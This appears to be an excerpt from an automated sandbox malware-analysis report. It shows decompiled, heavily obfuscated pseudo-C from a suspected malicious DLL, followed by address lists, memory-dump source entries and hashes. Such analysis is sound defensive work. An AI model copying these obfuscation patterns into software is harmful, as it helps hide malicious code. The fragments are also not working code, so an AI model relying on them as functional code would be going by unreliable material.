												_t718 = E6D507EB5( *(( *0x6d55d5c0 & 0x0000ffff) * 0xc + _v44) &  *(_t946 + _t819) & 0x0000ffff, _v8,  *0x6d55d5c0 & 0x0000ffff, ( *0x6d55d5c0 & 0x0000ffff) *  *0x6d55d574, 0x4c, _v28 * _t976,  *((intOrPtr*)(_v44 + 0x628)) + _t925, _v16, _t674, 0x16da -  *0x6d55d5e0);
												_t946 = _v32;
												_t1013 = _t1013 + 0x2c;
												_t681 =  *0x6d55d5b4; // 0x0
												_v48 = _t681 / (_v48 & 0x000000ff);
												_t930 = _v16 + 1;
												_t683 = _v52;
												 *0x6d55d5d4 = _t718;
												_v16 = _t930;
												__eflags = _t930 - ( *(_t683 + 0x16f1) & 0x000000ff);
												if(_t930 != ( *(_t683 + 0x16f1) & 0x000000ff)) {
													break;
												}
												_t976 =  *0x6d55d5e0; // 0x0
												_t819 = _v4;
											}
											_t684 =  *0x6d55d598; // 0x0
											_t1001 = _a24;
											_v28 = _t684;
										}
										_t977 = _a8;
										_t525 =  *0x6d55d5ac; // 0x0
										__eflags =  *((intOrPtr*)(_t977 + _t525 * 4)) - 0x22;
										if( *((intOrPtr*)(_t977 + _t525 * 4)) < 0x22) {
											L20:
											_t529 =  *0x6d55d5e0; // 0x0
											_t862 = (0x00000e36 -  *0x6d55d5a4) % (_v56 & 0x0000ffff) & 0x0000ffff;
											_a12 = _t862;
											 *0x6d55d5e0 = _t529 + 1;
											_t773 =  *0x6d55d5b0; // 0x0
											_push( *0x6d55d5b4);
											_t774 = _t773 - 1;
											 *0x6d55d5b0 = _t774;
											_v4 = _v28 + _t774;
											_t776 =  *0x6d55d57c; // 0x0
											_t536 =  *0x6d55d5bc; // 0x0
											_push( *((intOrPtr*)(_t536 + _t776 * 4)));
											_push( *(( *0x6d55d59c & 0x0000ffff) + _a16) & 0x000000ff ^  *0x6d55d580);
											_push(_v4);
											_push(0x1576);
											_push((_t862 & 0x0000ffff) / ( *0x6d55d5c4 & 0x0000ffff));
											_push( *(_v44 + _t529 * 4) & 0x000015c4);
											_push(_t946[_t718] & 0x0000ffff);
											_t537 = E6D519823();
											_t777 =  *0x6d55d5e0; // 0x0
											_t1014 = _t1013 + 0x20;
											_t778 = _t777 + 1;
											 *0x6d55d59c = _t537;
											_t979 = _a16;
											 *0x6d55d5e0 = _t778;
											 *((char*)(_t778 + _v52)) =  *((intOrPtr*)(_v44 + 0x77a8)) -  *((intOrPtr*)(_t778 + _v52));
											_t541 =  *0x6d55d580; // 0x0
											_t542 = _t541 + 1;
											 *0x6d55d580 = _t542;
											_t780 =  *(_t542 * 3 + _t979) & 0x000000ff ^ ( *(_a4 + 0x690) |  *0x6d55d5a4);
											__eflags = _t780;
											 *(_v36 +  *_t1001 * 2) = _t780;
											_t869 = _a12;
										} else {
											_t806 = _v56 & 0x0000ffff;
											_t629 =  *0x6d55d5c0 & 0x0000ffff;
											_v4 = _t806;
											__eflags =  *((intOrPtr*)(_t977 + _t806 * 4)) - _t629;
											if( *((intOrPtr*)(_t977 + _t806 * 4)) <= _t629) {
												goto L20;
											} else {
												_t807 = _a4;
												_t913 = _t629 + _t629;
												_t631 = _t718 + _t718;
												_t718 = _t718 - 1;
												 *0x6d55d5d4 = _t718;
												__eflags =  *((intOrPtr*)(_t807 + _t631 * 8)) -  *((intOrPtr*)(_t977 + _t913 * 8));
												if( *((intOrPtr*)(_t807 + _t631 * 8)) >=  *((intOrPtr*)(_t977 + _t913 * 8))) {
													goto L20;
												} else {
													__eflags =  *((intOrPtr*)(_a20 + _t718 * 8)) -  *0x6d55d5b8; // 0x0
													if(__eflags != 0) {
														goto L20;
													} else {
														_t635 =  *0x6d55d5ac; // 0x0
														_t990 =  *0x6d55d5bc; // 0x0
														_t809 = _v36;
														_t732 =  *0x6d55d58a; // 0x0
														_v16 = _t635;
														 *0x6d55d5ac = _t635 - 1;
														_v4 =  *(_t809 + 0x27de) & 0x0000ffff;
														_t733 = _t732 + 1;
														_v8 =  *((intOrPtr*)(_t990 + _v4 * 4)) - 0x1b0e;
														_t640 = _v28;
														 *0x6d55d58a = _t733;
														 *0x6d55d598 = _t640 - 1;
														_t642 =  *0x6d55d584; // 0x0
														_t643 = _t642 - 1;
														 *0x6d55d584 = _t643;
														_push( *((intOrPtr*)(_a8 + ( *0x6d55d5c0 & 0x0000ffff) * 4)));
														_push(0x1701 -  *0x6d55d590);
														 *0x6d55d5c0 =  *0x6d55d5c0 + 0xffff;
														_push( *((intOrPtr*)(_t643 * 0xc + _t990)));
														_push(( *(_t809 + _t640 * 4) & 0x0000ffff) % (_t733 & 0x000000ff));
														_push(_v4);
														_push(_v8);
														_push(_v16);
														_push(_a12);
														_t735 = (E6D519823() & 0x0000ffff) + 1;
														_t813 = _t735 & 0x0000ffff;
														_t958 =  *0x6d55d598; // 0x0
														_v28 =  *((intOrPtr*)(_v20 + 0xe4c));
														_v16 =  *(_a4 + _t813 * 4) * _t813;
														_t654 =  *0x6d55d5d4; // 0x0
														 *0x6d55d5d4 = _t654 - 1;
														_t656 =  *0x6d55d5b8; // 0x0
														_v8 = _t654 | 0x0000142a;
														_v4 = _t656 - _t813;
														_t736 = _t735 + 0xffff;
														_t992 = _t736 & 0x0000ffff;
														_a12 = _t736;
														_t737 =  *0x6d55d5dc; // 0x0
														_t664 =  *0x6d55d5b4; // 0x0
														_t666 =  *0x6d55d5c8; // 0x0
														_push(0x87f);
														_push( *0x6d55d5c4 & 0x0000ffff &  *0x6d55d588 & 0x0000ffff);
														_push( *(_t666 + _t992 * 4) ^ _t958);
														_push(_t664 % ( *(_v36 + 0xe + _t992 * 2) & 0x0000ffff));
														_push( *0x6d55d58c);
														 *0x6d55d598 = _t958 - 1;
														_push( *0x6d55d5d8);
														_push(_t737 *  *0x6d55d5a0);
														_push( *(_a8 + _t958 * 4) % ( *(_t992 + _v52) & 0x000000ff));
														_push(_v4);
														_push(_v8);
														_push(_v16);
														_push(_v28);
														_t668 = E6D515CA6();
														_t869 = _a12;
														_t1014 = _t1013 + 0x50;
														_t1001 = _a24;
														_t979 = _a16;
														 *((intOrPtr*)(_a8 + 0x20 + (_t869 & 0x0000ffff) * 4)) = _t668;
													}
												}
											}
										}
										_t548 =  *0x6d55d588; // 0x0
										_t549 = _t548 + 1;
										_t950 = _v12;
										_t870 = _t869 + 1;
										 *0x6d55d588 = _t549;
										_t720 = _t870 & 0x0000ffff;
										_a12 = _t870;
										_v4 = _t720;
										 *((short*)(_t720 * 6 + _v36)) = (_t549 & 0x0000ffff) / (_t549 & 0x0000ffff);
										_t784 = _v52;
										 *(_t979 + 8 + _t720 * 4) = 0xb44 % ( *(_t979 + 8 + _t720 * 4) & 0x000000ff);
										_t554 =  *_t950 * 3;
										__eflags =  *((intOrPtr*)(_t554 + _t784)) - _v48;
										_t785 =  *0x6d55d598; // 0x0
										if( *((intOrPtr*)(_t554 + _t784)) != _v48) {
											L23:
											_t555 =  *0x6d55d57c; // 0x0
											__eflags = _t555 -  *0x6d55d5e4; // 0x0
											if(__eflags > 0) {
												goto L25;
											} else {
												 *0x6d55d5e4 = _t785;
											}
										} else {
											_t627 = _a4;
											__eflags =  *((intOrPtr*)(_t627 + _t785 * 4)) - _v24;
											if( *((intOrPtr*)(_t627 + _t785 * 4)) != _v24) {
												L25:
												_t980 =  *0x6d55d5e0; // 0x0
												_t786 =  *0x6d55d578; // 0x0
												_t981 = _t980 - 1;
												_t721 = _v20;
												 *0x6d55d5e0 = _t981;
												 *0x6d55d5b0 = 0xc4a;
												 *((intOrPtr*)(_v44 + _t981 * 4)) = (_v57 & 0x000000ff) /  *(_t721 + _t786 * 4) / _v24 -  *((intOrPtr*)(_v44 + _t981 * 4));
												_t788 =  *0x6d55d59c; // 0x0
												_t982 =  *0x6d55d57c; // 0x0
												 *0x6d55d5d4 = (( *0x6d55d5d0 & 0x0000ffff | _t982) & _t788 & 0x0000ffff) -  *0x6d55d5d4;
												 *0x6d55d59c = _t788 + 1;
												_t790 =  *0x6d55d594; // 0x0
												 *0x6d55d57c = _t982 + 1;
												 *(_t790 + _v4 * 4) =  *(_t790 + _v4 * 4) ^  *0x6d55d58a & 0x000000ff;
												 *_t1001 =  *_t1001 + 1;
												_t984 =  *_t1001;
												_t562 =  *0x6d55d5bc; // 0x0
												_t887 = _t984 + _t984;
												__eflags =  *((intOrPtr*)(_t562 + _t887 * 8)) - 0x1a0e;
												if( *((intOrPtr*)(_t562 + _t887 * 8)) < 0x1a0e) {
													_t1002 =  &_a4;
													_t985 =  *(_a8 + _t984 * 4);
													_t564 =  *0x6d55d5a0; // 0x0
													_t565 = _t564 - 1;
													_a4 = _t985;
													 *0x6d55d5a0 = _t565;
													_t566 = _t565 + _t565;
													__eflags = _t985 -  *((intOrPtr*)(_t950 + _t566 * 8));
													if(_t985 <=  *((intOrPtr*)(_t950 + _t566 * 8))) {
														_t888 = _v40;
														_a8 = _t888 & 0x000000ff;
														_v16 = _t1002 + (_t985 << 4);
														_a16 = _t721 + _t985 * 4;
														_a24 = _t950 + _t985 * 0xc;
														_t575 = _a20 - _t721;
														__eflags = _t575;
														_v4 = _t575;
														do {
															_t791 = _v32;
															_push(0x177a);
															_v40 = _t888 + 1;
															_t792 =  *0x6d55d574; // 0x0
															_t580 = _v40 & 0x000000ff;
															_a8 = _t580;
															_a12 = _a12 + 1;
															_push(_a12 & 0x0000ffff);
															_push(_t792 - _a4);
															_push( *0x6d55d588 & 0x0000ffff | _t580);
															_push(_v24);
															_push(0x8b9);
															_push(_t985 *  *0x6d55d580);
															_t987 = _a4;
															_push(( *(_t791 + _t985 * 8) & 0x0000ffff) /  *0x6d55d580);
															_push( *(_t791 +  *_t950 * 8) & 0x0000ffff | _a8);
															_push( *0x6d55d5a4);
															_push(_t987);
															_push( *0x6d55d5d8);
															_t583 = E6D515CA6();
															_t952 = _v44;
															_t724 = _a12;
															 *((intOrPtr*)(_t1002 + ( *_t1002 +  *_t1002) * 8)) = _t583;
															_t584 =  *0x6d55d5e0; // 0x0
															 *0x6d55d580 =  *((intOrPtr*)(_t952 + _t584 * 8)) + 0x1286;
															_t589 =  *0x6d55d5a0; // 0x0
															_a12 = _t724 + 1;
															_push( *((intOrPtr*)(_t952 + _t589 * 4)));
															_t953 = _a16;
															asm("cdq");
															_push(0x193a /  *(_v4 + _t953));
															_t592 =  *0x6d55d5a8; // 0x0
															_push( *(_t592 + 0x69a4) &  *0x6d55d5ac);
															asm("cdq");
															_t728 = _a24;
															_push(_t987);
															_push(_t987 / 0xb47);
															_push( *0x6d55d578);
															_push( *(_v32 + (_t724 & 0x0000ffff) * 6) & 0x0000ffff ^ _a8);
															_push( *( *_t1002 * 0xc + _a20) /  *_t728);
															E6D519823();
															_t1014 = _t1014 + 0x50;
															_t799 = _v16;
															_a16 = _t953 + 4;
															_t950 = _v12;
															_a24 =  &(_t728[3]);
															_t888 = _v40;
															_t985 = _t987 + 1;
															 *_t799 = (_t987 -  *_t953) /  *_t799;
															_t604 =  *0x6d55d5a0; // 0x0
															_t605 = _t604 - 1;
															_a4 = _t985;
															 *0x6d55d5a0 = _t605;
															_t606 = _t605 + _t605;
															_v16 =  &(_t799[4]);
															__eflags = _t985 -  *((intOrPtr*)(_t950 + _t606 * 8));
														} while (_t985 <=  *((intOrPtr*)(_t950 + _t606 * 8)));
													}
												} else {
													_t801 =  *0x6d55d5a8; // 0x0
													_t607 =  *0x6d55d5e0; // 0x0
													_t730 = _a16;
													_push(0x163b);
													 *((intOrPtr*)(_t801 + _t887 * 8)) = _t607 -  *((intOrPtr*)(_t801 + _t887 * 8));
													_t802 =  *0x6d55d5d4; // 0x0
													_t988 =  *0x6d55d598; // 0x0
													_a20 =  *(_v36 + 0x19c4) & 0x0000ffff;
													_t612 =  *0x6d55d5c0; // 0x0
													_t803 = _t802 + 1;
													_a4 = ( *(_v32 + 0xe + _t802 * 2) & 0x0000ffff) - ( *(_t730 + 0x101e) & 0x000000ff);
													_t613 = _t612 + 1;
													 *0x6d55d5d4 = _t803;
													 *0x6d55d5c0 = _t613;
													_t614 = _t613 & 0x0000ffff;
													_a8 = 0xe90 -  *((intOrPtr*)(_t950 + 0x20 + _t614 * 4));
													_t906 =  *0x6d55d5d8; // 0x0
													_t989 = _t988 + 1;
													_t907 = _t906 + 1;
													_t617 =  *0x6d55d5bc; // 0x0
													 *0x6d55d5d8 = _t907;
													 *0x6d55d598 = _t989;
													_push( *((intOrPtr*)(_t617 + 0x2adc)));
													_t619 =  *0x6d55d5a8; // 0x0
													_push( *(_t619 +  *(_a24 - 4) * 4) & _t907);
													_t622 =  *0x6d55d580; // 0x0
													_t624 =  *0x6d55d57c; // 0x0
													_push(_t622 % 0x70a);
													asm("cdq");
													_push( *0x6d55d5dc);
													_push(_t624 / _t989);
													_push(_t950[_t803] + 0xff6);
													_push( *( *_a24 + _t730) & 0x000000ff);
													_push(0x307 - _t950[_t614]);
													_push(_a8);
													_push(_a4);
													_push(_a20);
													E6D515CA6();
												}
											} else {
												goto L23;
											}
										}
									} else {
										_t931 =  *0x6d55d588; // 0x0
										_t932 = _t931 + 0xffff;
										 *0x6d55d588 = _t932;
										 *(_a8 + ( *_t1001 << 4)) = (_t932 & 0x0000ffff) /  *(_a8 + ( *_t1001 << 4));
									}
								}
							}
						}
					}
				} else {
					_t695 =  *0x6d55d5d4; // 0x0
					_t696 =  *0x6d55d570; // 0x0
					_t697 =  *0x6d55d588; // 0x0
					_t830 =  *0x6d55d5dc; // 0x0
					_t698 = _t697 + 1;
					 *0x6d55d588 = _t698;
					_push(_t830 - (_t698 & 0x0000ffff));
					_t700 = E6D507EB5( *( *0x6d55d578 * 3 + _v52) & 0x000000ff &  *0x6d55d5d0 & 0x0000ffff,  *((intOrPtr*)(_t969 + _t695 * 4)),  *0x6d55d59c & 0x0000ffff,  *0x6d55d5a0, 0x6ed,  *(_t696 + (_t850 & 0x0000ffff) * 4) * _t1001[_t850 & 0x0000ffff], 0x159f, 0x436, 0x27b,  *0x6d55d5a4);
					_push(0x1488);
					 *((intOrPtr*)(_a4 +  *_t1001 * 4)) = _t700;
					_t701 =  *0x6d55d590; // 0x0
					_t702 = _t701 - 1;
					_t965 =  *0x6d55d5dc; // 0x0
					 *0x6d55d590 = _t702;
					_t705 =  *0x6d55d574; // 0x0
					_a4 = (_v57 & 0x000000ff) * _t702;
					_t940 =  *0x6d55d5b0; // 0x0
					_t835 =  *0x6d55d5e0; // 0x0
					_t79 = _t705 - 0x10f5; // -4341
					 *0x6d55d574 = _t705 - 1;
					 *((intOrPtr*)((_v56 - 0x00000001 & 0x0000ffff) * 0xc + _a8)) = E6D507EB5(0x187, _a4, 0x1268 %  *0x6d55d58c, _t940 | 0x00000f17, _t965 ^ 0x0000033c, _t79, 0x222, _t835 ^ _v24, ( *0x6d55d5c0 & 0x0000ffff) * (_v57 & 0x000000ff), 0x1312);
					asm("cdq");
					 *(_a20 +  *_a24 * 4) = ( *0x6d55d59c & 0x0000ffff | _a12) %  *(_a20 +  *_a24 * 4);
				}
				_t507 =  *0x6d55d574; // 0x0
				return _t507;
			}






























































































































































































            0x6d51799a
            0x6d5179a7
            0x6d5179ad
            0x6d5179b4
            0x6d5179b8
            0x6d5179c3
            0x6d5179c9
            0x6d5179cd
            0x6d5179d2
            0x6d5179d6
            0x6d5179db
            0x6d5179e7
            0x6d5179eb
            0x6d5179f0
            0x6d5179f7
            0x6d5179fd
            0x6d517a03
            0x6d517a07
            0x6d517a0e
            0x6d517a13
            0x6d517a17
            0x6d517a24
            0x6d517a31
            0x6d517a43
            0x6d517a4f
            0x6d517a53
            0x6d517a58
            0x6d517a66
            0x6d517a6b
            0x6d517a7a
            0x6d517a90
            0x6d517a9f
            0x6d517aaa
            0x6d517aaf
            0x6d517ab7
            0x6d517abf
            0x6d517ac0
            0x6d517aca
            0x6d517acb
            0x6d517acd
            0x6d517ace
            0x6d517acf
            0x6d517ad0
            0x6d517ad1
            0x6d517ad2
            0x6d517ad7
            0x6d517ad9
            0x6d517ada
            0x6d517adf
            0x6d517ae5
            0x6d517ae8
            0x6d517aec
            0x6d517af0
            0x6d517af8
            0x6d517afc
            0x6d517afe
            0x6d517b0b
            0x6d517b13
            0x6d517b16
            0x6d517b1c
            0x6d517b25
            0x6d517b2b
            0x6d517c7a
            0x6d517c7f
            0x6d517c83
            0x6d517c87
            0x6d517c8e
            0x6d517c94
            0x6d51859f
            0x6d51859f
            0x6d5185a8
            0x6d5185af
            0x6d5185ba
            0x6d5185ba
            0x6d5185ba
            0x6d517c9a
            0x6d517c9a
            0x6d517c9f
            0x6d517ca6
            0x00000000
            0x6d517cac
            0x6d517cae
            0x6d517cb3
            0x6d517cb5
            0x6d517cbd
            0x6d517cc1
            0x6d517d21
            0x6d517d29
            0x6d517d2c
            0x6d517d39
            0x6d517d3e
            0x6d517d54
            0x6d517d5a
            0x6d517d60
            0x6d517d64
            0x6d517d84
            0x6d517d8a
            0x6d517d91
            0x6d517d97
            0x6d517d9a
            0x6d517d9f
            0x6d517da3
            0x00000000
            0x6d517cc3
            0x6d517cc3
            0x6d517cd4
            0x6d517cd5
            0x6d517cdb
            0x6d517cdd
            0x00000000
            0x6d517cdf
            0x6d517cdf
            0x6d517ce3
            0x6d517ce7
            0x6d517ceb
            0x6d517da9
            0x6d517dad
            0x6d517dad
            0x6d517db7
            0x6d517dbb
            0x6d517dbf
            0x6d517dca
            0x6d517dcc
            0x6d517dd2
            0x6d517dd5
            0x6d517dd5
            0x6d517dd8
            0x6d517de3
            0x6d517de7
            0x6d517deb
            0x6d517e06
            0x6d517e22
            0x6d517e2c
            0x6d517e3c
            0x6d517e3d
            0x6d517e4b
            0x6d517e61
            0x6d517e63
            0x6d517e70
            0x6d517e73
            0x6d517e7e
            0x6d517e82
            0x6d517e83
            0x6d517e87
            0x6d517e8d
            0x6d517e98
            0x6d517e9a
            0x00000000
            0x00000000
            0x6d517e9c
            0x6d517ea2
            0x6d517ea2
            0x6d517eab
            0x6d517eb0
            0x6d517eb4
            0x6d517eb4
            0x6d517eb8
            0x6d517ebc
            0x6d517ec1
            0x6d517ec5
            0x6d5180c7
            0x6d5180e1
            0x6d5180f1
            0x6d5180f4
            0x6d518102
            0x6d51810e
            0x6d518114
            0x6d51811c
            0x6d518123
            0x6d518130
            0x6d51813c
            0x6d518142
            0x6d51814d
            0x6d518150
            0x6d518151
            0x6d518155
            0x6d51815a
            0x6d51815b
            0x6d51815c
            0x6d51815d
            0x6d518162
            0x6d518168
            0x6d51816f
            0x6d518170
            0x6d51817a
            0x6d51817e
            0x6d51818d
            0x6d518190
            0x6d518199
            0x6d51819a
            0x6d5181b8
            0x6d5181b8
            0x6d5181be
            0x6d5181c2
            0x6d517ecb
            0x6d517ecf
            0x6d517ed2
            0x6d517ed9
            0x6d517edd
            0x6d517ee0
            0x00000000
            0x6d517ee6
            0x6d517ee6
            0x6d517eee
            0x6d517ef0
            0x6d517ef2
            0x6d517ef9
            0x6d517eff
            0x6d517f01
            0x00000000
            0x6d517f07
            0x6d517f0e
            0x6d517f14
            0x00000000
            0x6d517f1a
            0x6d517f1a
            0x6d517f24
            0x6d517f2a
            0x6d517f2e
            0x6d517f34
            0x6d517f39
            0x6d517f4f
            0x6d517f60
            0x6d517f62
            0x6d517f66
            0x6d517f6a
            0x6d517f7c
            0x6d517f81
            0x6d517f86
            0x6d517f87
            0x6d517f9b
            0x6d517f9c
            0x6d517fa4
            0x6d517faf
            0x6d517fb0
            0x6d517fb1
            0x6d517fb2
            0x6d517fb6
            0x6d517fba
            0x6d517fca
            0x6d517fcb
            0x6d517fce
            0x6d517fda
            0x6d517fe8
            0x6d517fec
            0x6d517ffa
            0x6d517fff
            0x6d518006
            0x6d51800a
            0x6d518015
            0x6d51801b
            0x6d51801e
            0x6d518022
            0x6d518047
            0x6d518050
            0x6d51805c
            0x6d518070
            0x6d518071
            0x6d518072
            0x6d518073
            0x6d518079
            0x6d51807f
            0x6d518085
            0x6d518086
            0x6d518087
            0x6d51808e
            0x6d518095
            0x6d51809c
            0x6d5180a0
            0x6d5180a5
            0x6d5180ac
            0x6d5180b3
            0x6d5180b7
            0x6d5180be
            0x6d5180be
            0x6d517f14
            0x6d517f01
            0x6d517ee0
            0x6d5181c6
            0x6d5181cc
            0x6d5181ce
            0x6d5181d2
            0x6d5181d3
            0x6d5181d9
            0x6d5181df
            0x6d5181e7
            0x6d5181f4
            0x6d518206
            0x6d51820a
            0x6d51820e
            0x6d518215
            0x6d518218
            0x6d51821e
            0x6d51822d
            0x6d51822d
            0x6d518232
            0x6d518238
            0x00000000
            0x6d51823a
            0x6d51823a
            0x6d51823a
            0x6d518220
            0x6d518220
            0x6d518228
            0x6d51822b
            0x6d518245
            0x6d518245
            0x6d51824d
            0x6d518253
            0x6d518254
            0x6d51825d
            0x6d518263
            0x6d51827d
            0x6d518280
            0x6d518287
            0x6d5182aa
            0x6d5182b5
            0x6d5182bc
            0x6d5182c2
            0x6d5182c8
            0x6d5182cb
            0x6d5182ce
            0x6d5182d3
            0x6d5182d8
            0x6d5182da
            0x6d5182e1
            0x6d5183e4
            0x6d5183e7
            0x6d5183ea
            0x6d5183ef
            0x6d5183f0
            0x6d5183f4
            0x6d5183f9
            0x6d5183fb
            0x6d5183fe
            0x6d518404
            0x6d51840b
            0x6d518416
            0x6d51841d
            0x6d518426
            0x6d51842e
            0x6d51842e
            0x6d518430
            0x6d518434
            0x6d518436
            0x6d51843a
            0x6d51844d
            0x6d518460
            0x6d518477
            0x6d51847c
            0x6d518484
            0x6d51848b
            0x6d51848c
            0x6d51848d
            0x6d51848e
            0x6d518492
            0x6d518497
            0x6d518498
            0x6d51849c
            0x6d51849d
            0x6d51849e
            0x6d5184a4
            0x6d5184a5
            0x6d5184ab
            0x6d5184b3
            0x6d5184b9
            0x6d5184c4
            0x6d5184c8
            0x6d5184d5
            0x6d5184e4
            0x6d5184f1
            0x6d5184fc
            0x6d5184ff
            0x6d51850b
            0x6d518514
            0x6d518515
            0x6d518526
            0x6d518529
            0x6d51852c
            0x6d518535
            0x6d518536
            0x6d518537
            0x6d518541
            0x6d51854e
            0x6d51854f
            0x6d518554
            0x6d51855d
            0x6d518567
            0x6d51856b
            0x6d51856f
            0x6d518575
            0x6d518579
            0x6d51857a
            0x6d51857f
            0x6d518584
            0x6d518585
            0x6d518589
            0x6d51858e
            0x6d518590
            0x6d518594
            0x6d518594
            0x6d51859d
            0x6d5182e7
            0x6d5182e7
            0x6d5182f2
            0x6d5182f7
            0x6d5182fb
            0x6d518303
            0x6d51830a
            0x6d518314
            0x6d518321
            0x6d518333
            0x6d518339
            0x6d51833a
            0x6d51833e
            0x6d518340
            0x6d518346
            0x6d518351
            0x6d518362
            0x6d51836c
            0x6d518372
            0x6d518375
            0x6d51837a
            0x6d51837f
            0x6d518385
            0x6d51838b
            0x6d518398
            0x6d5183a9
            0x6d5183aa
            0x6d5183b1
            0x6d5183b6
            0x6d5183b7
            0x6d5183ba
            0x6d5183c0
            0x6d5183c1
            0x6d5183c2
            0x6d5183c3
            0x6d5183c4
            0x6d5183c8
            0x6d5183cc
            0x6d5183d3
            0x6d5183d8
            0x00000000
            0x00000000
            0x00000000
            0x6d51822b
            0x6d517cf1
            0x6d517cf1
            0x6d517d01
            0x6d517d04
            0x6d517d1a
            0x6d517d1a
            0x6d517ceb
            0x6d517cdd
            0x6d517cc1
            0x6d517ca6
            0x6d517b31
            0x6d517b4c
            0x6d517b54
            0x6d517b68
            0x6d517b6e
            0x6d517b74
            0x6d517b76
            0x6d517b81
            0x6d517ba6
            0x6d517bb7
            0x6d517bc1
            0x6d517bc6
            0x6d517bcd
            0x6d517bce
            0x6d517bdd
            0x6d517bed
            0x6d517bf4
            0x6d517bfb
            0x6d517c01
            0x6d517c11
            0x6d517c18
            0x6d517c55
            0x6d517c70
            0x6d517c73
            0x6d517c73
            0x6d5185be
            0x6d5185ca

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 15d2bbc16171495fdffbc2ad7fdf7d10b4f4cfa8b5a54e9e65988c3032f713ac
            • Instruction ID: 1120560437b922ccac3d8f85c624a172d0b2784db8ca312e4fd76f8f11056914
            • Opcode Fuzzy Hash: 15d2bbc16171495fdffbc2ad7fdf7d10b4f4cfa8b5a54e9e65988c3032f713ac
            • Instruction Fuzzy Hash: 23824A766082509FDB16DF19C480A26BBF1FBCA308F16446EF886C7B51E7B4A851CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D5061B5 Relevance: .6, Instructions: 633COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 93%
            			E6D5061B5() {
				signed int _t463;
				signed int _t464;
				intOrPtr _t470;
				signed int _t473;
				intOrPtr _t479;
				signed int _t484;
				intOrPtr _t487;
				signed short _t503;
				signed int _t510;
				signed int _t516;
				intOrPtr _t520;
				intOrPtr _t526;
				intOrPtr _t527;
				signed int _t528;
				intOrPtr _t546;
				signed int _t564;
				signed int _t567;
				signed short _t569;
				signed short _t570;
				signed int _t580;
				signed int _t582;
				signed int _t584;
				signed int _t585;
				signed short _t587;
				signed int _t588;
				signed int _t591;
				intOrPtr _t596;
				signed int _t601;
				signed int _t606;
				signed int _t608;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed short _t619;
				signed int _t624;
				signed short _t630;
				signed int _t635;
				char _t648;
				intOrPtr _t652;
				signed char _t655;
				intOrPtr _t657;
				signed int _t661;
				intOrPtr _t663;
				intOrPtr _t665;
				signed int _t666;
				signed int _t667;
				intOrPtr _t669;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t683;
				signed int _t687;
				signed int _t688;
				signed int _t690;
				signed int _t694;
				signed int _t696;
				signed int _t702;
				signed int _t703;
				signed int _t708;
				intOrPtr _t713;
				signed int _t715;
				intOrPtr _t724;
				signed int _t733;
				intOrPtr _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed char _t754;
				signed short _t768;
				signed int _t769;
				signed int _t777;
				signed int _t778;
				intOrPtr _t779;
				signed short _t792;
				signed int _t796;
				signed int _t813;
				signed int _t815;
				signed int _t818;
				signed short _t826;
				signed int _t829;
				signed int _t832;
				signed int _t833;
				signed short _t834;
				signed short _t837;
				signed short _t838;
				signed int _t839;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t854;
				signed int _t856;
				signed int _t858;
				signed int _t859;
				signed int* _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed short _t872;
				signed int _t874;
				intOrPtr _t875;
				signed int _t878;
				signed short _t880;
				void* _t883;
				void* _t892;
				void* _t895;

				_t779 =  *((intOrPtr*)(_t883 + 0x60));
				_t679 =  *(_t883 + 0x6c);
				_t875 =  *((intOrPtr*)(_t883 + 0x58));
				_t854 =  *(_t883 + 0x64);
				_t844 =  *0x6d55d5dc; // 0x0
				 *(_t883 + 0x48) = 0x1c33;
				_t463 =  *0x6d55d584; // 0x0
				 *(_t883 + 0x44) = _t463;
				_t464 =  *0x6d55d5d8; // 0x0
				 *(_t883 + 0x40) = _t464;
				 *(_t883 + 0x54) =  *(( *0x6d55d588 & 0x0000ffff) + _t854 + 0x18) & 0x000000ff &  *(_t779 + 0x31a0) & 0x0000ffff;
				_t687 =  *(_t883 + 0x64);
				 *(_t883 + 0x38) = _t687;
				_t688 = _t687 - 1;
				_t845 = _t844 + 1;
				 *(_t883 + 0x64) = _t688;
				 *0x6d55d5dc = _t845;
				 *(_t883 + 0x18) =  *((intOrPtr*)(_t779 + 0x3d1c)) -  *((intOrPtr*)(_t779 + _t679 * 2)) & 0x0000ffff;
				 *(_t883 + 0x34) = _t688 ^ 0x0000025f;
				_t470 =  *0x6d55d5bc; // 0x0
				_t690 =  *0x6d55d5d4; // 0x0
				 *(_t883 + 0x1c) = ( *(_t875 + 0x18e6) & 0x000000ff) - 0x000000d3 & 0x0000ffff;
				 *(_t883 + 0x3c) = _t845 | 0x000007b3;
				 *(_t883 + 0x4c) =  *(_t470 + _t679 * 4) |  *0x6d55d590;
				_t473 =  *0x6d55d5a4; // 0x0
				 *(_t883 + 0x30) = _t473;
				 *(_t883 + 0x2c) =  *( *(_t883 + 0x44) + _t854) & 0x000000ff;
				_t680 = _t679 - 1;
				 *(_t883 + 0x20) = ( *(_t883 + 0x74) ^ 0x00000768) & 0x0000ffff;
				_t479 =  *0x6d55d5c8; // 0x0
				 *(_t883 + 0x14) = _t680;
				 *(_t883 + 0x13) =  *((intOrPtr*)(_t479 + _t690 * 4)) + 0x37;
				 *0x6d55d5d4 = _t690 + 1;
				 *(_t883 + 0x28) =  *(_t854 + _t680 + 8) & 0x000000ff ^ _t680;
				_t681 = _t680 + 2;
				_t484 =  *0x6d55d598; // 0x0
				asm("cdq");
